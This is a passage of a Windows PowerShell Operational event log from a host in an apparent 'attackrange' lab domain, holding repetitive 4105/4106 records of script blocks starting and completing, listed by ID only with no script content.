Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477466
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477465
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477464
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477463
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477462
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477461
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477460
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477459
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477458
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477457
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477456
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477455
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477454
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477453
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477452
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477451
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477450
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477449
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477448
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477447
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477446
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477445
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477444
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477443
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477442
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477441
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477440
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477439
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477438
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477437
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477436
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477435
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477434
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477433
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477432
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477431
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477430
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477429
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477428
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477427
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477426
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477425
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477424
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477423
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477422
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477421
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477420
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477419
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477418
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477417
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477416
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477415
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477414
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477413
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1477412
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1477411
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:04:27 PM
LogName=Microsoft-Windows-PowerShell/Operational
